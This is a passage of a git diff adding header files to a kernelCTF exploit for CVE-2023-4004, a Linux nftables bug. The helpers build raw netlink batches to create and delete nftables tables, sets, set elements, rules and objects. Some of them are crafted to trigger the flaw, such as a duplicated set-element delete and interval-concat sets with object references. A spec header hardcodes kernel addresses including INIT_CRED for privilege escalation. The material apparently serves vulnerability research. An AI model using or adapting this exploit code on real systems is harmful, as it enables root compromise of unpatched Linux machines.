nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create object quota %s\n",obj_name); + } +} + +void get_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETOBJ, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_u32(msg, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg, NFTA_OBJ_NAME, obj_name); + nla_put_string(msg, NFTA_OBJ_TABLE, table_name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get obj %s\n",obj_name); + } +} + +void del_obj(struct nl_sock * socket, char *table_name, char *obj_name, uint32_t obj_type){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELOBJ),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + + nla_put_string(msg2, NFTA_OBJ_NAME, obj_name); + nla_put_u32(msg2, NFTA_OBJ_TYPE, htonl(obj_type)); + nla_put_string(msg2, NFTA_OBJ_TABLE, table_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Delete object %s\n",obj_name); + } + +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/rule.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/rule.h new file mode 100644 index 00000000..d1fcd292 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/rule.h @@ -0,0 +1,71 @@ +void new_rule(struct nl_sock * socket, char *table_name, char *chain_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWRULE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nl_msg * exprs = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *expr_data = nlmsg_alloc(); + + char *a = malloc(0x100); + memset(a,0x41,0x100); + nla_put_string(expr_data, NFTA_MATCH_NAME, "set"); + nla_put_u32(expr_data, NFTA_MATCH_REV, htonl(0)); + nla_put(expr_data, NFTA_MATCH_INFO,0x100,a); + + nla_put_string(data_nest, NFTA_EXPR_NAME, "match"); + nla_put_nested(data_nest, NFTA_EXPR_DATA, expr_data); + + nla_put_nested(exprs, NFTA_LIST_ELEM, data_nest); + nla_put_string(msg2, NFTA_RULE_TABLE, table_name); + nla_put_string(msg2, NFTA_RULE_CHAIN, chain_name); + nla_put_nested(msg2, NFTA_RULE_EXPRESSIONS, exprs); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Create rule\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/set.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/set.h new file mode 100644 index 00000000..d053bed8 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/set.h @@ -0,0 +1,77 @@ +void new_set(struct nl_sock * socket, char *table_name, char *set_name, uint32_t obj_type){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSET),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + struct nl_msg *data = nlmsg_alloc(); + struct nl_msg *data_nest = nlmsg_alloc(); + struct nl_msg *data_nest_nest = nlmsg_alloc(); + //init IPSET_ATTR_DATA + + int i=0; + + nla_put_u32(data_nest_nest, NFTA_SET_FIELD_LEN, htonl(0x10)); + for(i=0;i<2;i++){ + nla_put_nested(data_nest, NFTA_LIST_ELEM, data_nest_nest); + } + + nla_put_nested(data, NFTA_SET_DESC_CONCAT, data_nest); + //create test1 + nla_put_string(msg2, NFTA_SET_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_NAME, set_name); + nla_put_u32(msg2, NFTA_SET_ID, 0x10); + nla_put_nested(msg2, NFTA_SET_DESC, data); + nla_put_u32(msg2, NFTA_SET_KEY_LEN, htonl(0x40)); + nla_put_u32(msg2, NFTA_SET_FLAGS, htonl(NFT_SET_INTERVAL|NFT_SET_OBJECT|NFT_SET_CONCAT)); + nla_put_u32(msg2, NFTA_SET_OBJ_TYPE, htonl(obj_type)); + //int res = nl_send_auto(socket, msg); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/setelem.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/setelem.h new file mode 100644 index 00000000..6e8a2a28 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/setelem.h @@ -0,0 +1,212 @@ +#define OBJ_FOR_REF "obj-for-ref" +#define ELEM_KEY_END "test-elem-key-end" +void new_setelem(struct nl_sock * socket,char *table_name, char *set_name, void *udata, uint32_t ulen){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + struct nl_msg *elem_end = nlmsg_alloc(); + char *key = malloc(0x40); + char *key_end = malloc(0x40); + memset(key,0xff,0x40); + memset(key_end,0xff,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, OBJ_FOR_REF); + //nla_put_u32(elem_nest, NFTA_SET_ELEM_FLAGS, htonl(NFT_SET_ELEM_CATCHALL)); + if(udata>0){ + nla_put(elem_nest, NFTA_SET_ELEM_USERDATA, ulen, udata); + } + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create setelem\n"); + } +} + + +void del_setelem(struct nl_sock * socket){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + struct nl_msg *elem = nlmsg_alloc(); + struct nl_msg *elem_nest = nlmsg_alloc(); + struct nl_msg *elem_key = nlmsg_alloc(); + char *key = malloc(0x40); + memset(key,0x41,0x40); + nla_put(elem_key, NFTA_DATA_VALUE, 0x40, key); + nla_put_nested(elem_nest, NFTA_SET_ELEM_KEY, elem_key); + //nla_put_string(elem_nest, NFTA_SET_ELEM_OBJREF, "test-obj2"); + + nla_put_nested(elem, 1, elem_nest); + + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, "test_table"); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, "test_set"); + nla_put_nested(msg2, NFTA_SET_ELEM_LIST_ELEMENTS, elem); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len)*2 + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len), hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len)*2, hdr3, NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + printf("Delete setelem\n"); + } +} + +void elem_flush(struct nl_sock * socket, char *table_name, char *set_name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELSETELEM),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + //init msg + //create test1 + nla_put_string(msg2, NFTA_SET_ELEM_LIST_TABLE, table_name); + nla_put_string(msg2, NFTA_SET_ELEM_LIST_SET, set_name); + + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Flush set\n"); + } +} diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/spec.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/spec.h new file mode 100644 index 00000000..036abf51 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/spec.h @@ -0,0 +1,2 @@ +#define INIT_CRED 0xFFFFFFFF836618C0 +#define MODULE_CT_EXPECT_OBJ_TYPE_ADDR 0xFFFFFFFF8393A2C0 diff --git a/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/table.h b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/table.h new file mode 100644 index 00000000..a623f956 --- /dev/null +++ b/pocs/linux/kernelctf/CVE-2023-4004_lts_cos_mitigation/exploit/mitigation-6.1/table.h @@ -0,0 +1,197 @@ +void new_table(struct nl_sock * socket, char *name){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void new_table_with_udata(struct nl_sock * socket, char *name,char *udata, int len){ + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2;//NFPROTO_IPV4; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_NEWTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + nla_put_string(msg2, NFTA_TABLE_NAME, name); + nla_put(msg2,NFTA_TABLE_USERDATA,len,udata); + uint32_t total_size = NLMSG_ALIGN(hdr1->nlmsg_len) + NLMSG_ALIGN(hdr2->nlmsg_len) + NLMSG_ALIGN(hdr3->nlmsg_len); + char *buf = malloc(total_size); + memset(buf,0,total_size); + memcpy(buf,hdr1,NLMSG_ALIGN(hdr1->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len),hdr2, NLMSG_ALIGN(hdr2->nlmsg_len)); + memcpy(buf+NLMSG_ALIGN(hdr1->nlmsg_len)+NLMSG_ALIGN(hdr2->nlmsg_len),hdr3,NLMSG_ALIGN(hdr3->nlmsg_len)); + int res = nl_sendto(socket, buf, total_size); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Create table\n"); + } +} + +void get_table(struct nl_sock * socket, char *name){ + //init msg + struct nl_msg * msg = nlmsg_alloc(); + //(NFNL_SUBSYS_IPSET << 8) | (IPSET_CMD_CREATE); + nfnlmsg_put( + msg, + NL_AUTO_PID, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_SUBSYS_NFTABLES, //SUBSYS + NFT_MSG_GETTABLE, // TYPE + NLM_F_REQUEST, //NLM_F_ECHO + 2, //FAMILY + 0 //RES_ID + ); + //init msg + nla_put_string(msg, NFTA_TABLE_NAME, name); + + int res = nl_send_auto(socket, msg); + nlmsg_free(msg); + if (res < 0) { + fprintf(stderr, "sending message failed\n"); + } else { + //printf("Get table %s\n",name); + } +} +void del_table(struct nl_sock * socket, char *table_name){ + + struct nl_msg * msg = nlmsg_alloc(); + struct nlmsghdr *hdr1 = nlmsg_put( + msg, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_BEGIN, // TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST //NLM_F_ECHO + ); + struct nfgenmsg * h = malloc(sizeof(struct nfgenmsg)); + h->nfgen_family = 2; + h->version = 0; + h->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr1), h, sizeof(struct nfgenmsg)); + + struct nl_msg * msg2 = nlmsg_alloc(); + struct nlmsghdr *hdr2 = nlmsg_put( + msg2, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + (NFNL_SUBSYS_NFTABLES << 8) | (NFT_MSG_DELTABLE),// TYPE + sizeof(struct nfgenmsg), + NLM_F_REQUEST|NLM_F_CREATE //NLM_F_ECHO + ); + struct nfgenmsg * h2 = malloc(sizeof(struct nfgenmsg)); + h2->nfgen_family = 2;//NFPROTO_IPV4; + h2->version = 0; + h2->res_id = NFNL_SUBSYS_NFTABLES; + memcpy(nlmsg_data(hdr2), h2, sizeof(struct nfgenmsg)); + struct nl_msg * msg3 = nlmsg_alloc(); + struct nlmsghdr *hdr3 = nlmsg_put( + msg3, + NL_AUTO_PORT, // auto assign current pid + NL_AUTO_SEQ, // begin wit seq number 0 + NFNL_MSG_BATCH_END,// 